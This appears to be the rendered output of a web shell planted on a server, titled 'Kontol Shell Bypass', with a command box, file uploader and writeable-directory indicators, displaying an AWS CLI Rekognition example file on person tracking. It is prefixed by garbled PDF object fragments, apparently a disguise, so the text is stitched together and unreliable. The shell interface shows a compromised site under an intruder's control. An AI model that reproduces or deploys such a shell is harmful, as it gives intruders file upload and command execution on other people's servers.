%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/doc/awscli/examples/rekognition/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/doc/awscli/examples/rekognition/get-person-tracking.rst
**To get the results of a people pathing operation**

The following ``get-person-tracking`` command displays the results of a people pathing operation that you started previously by calling ``start-person-tracking``. ::

    aws rekognition get-person-tracking  \
        --job-id 1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef 

Output::

    {
        "Persons": [
            {
                "Timestamp": 500, 
                "Person": {
                    "BoundingBox": {
                        "Width": 0.4151041805744171, 
                        "Top": 0.07870370149612427, 
                        "Left": 0.0, 
                        "Height": 0.9212962985038757
                    }, 
                    "Index": 0
                }
            }, 
            {
                "Timestamp": 567, 
                "Person": {
                    "BoundingBox": {
                        "Width": 0.4755208194255829, 
                        "Top": 0.07777778059244156, 
                        "Left": 0.0, 
                        "Height": 0.9194444417953491
                    }, 
                    "Index": 0
                }
            }
        ], 
        "NextToken": "D/vRIYNyhG79ugdta3f+8cRg9oSRo+HigGOuxRiYpTn0ExnqTi1CJektVAc4HrAXDv25eHYk", 
        "JobStatus": "SUCCEEDED", 
        "VideoMetadata": {
            "Format": "QuickTime / MOV", 
            "FrameRate": 29.970617294311523, 
            "Codec": "h264", 
            "DurationMillis": 6806, 
            "FrameHeight": 1080, 
            "FrameWidth": 1920
        }
    }

For more information, see `People Pathing <https://docs.aws.amazon.com/rekognition/latest/dg/persons.html>`__ in the *Amazon Rekognition Developer Guide*.

Kontol Shell Bypass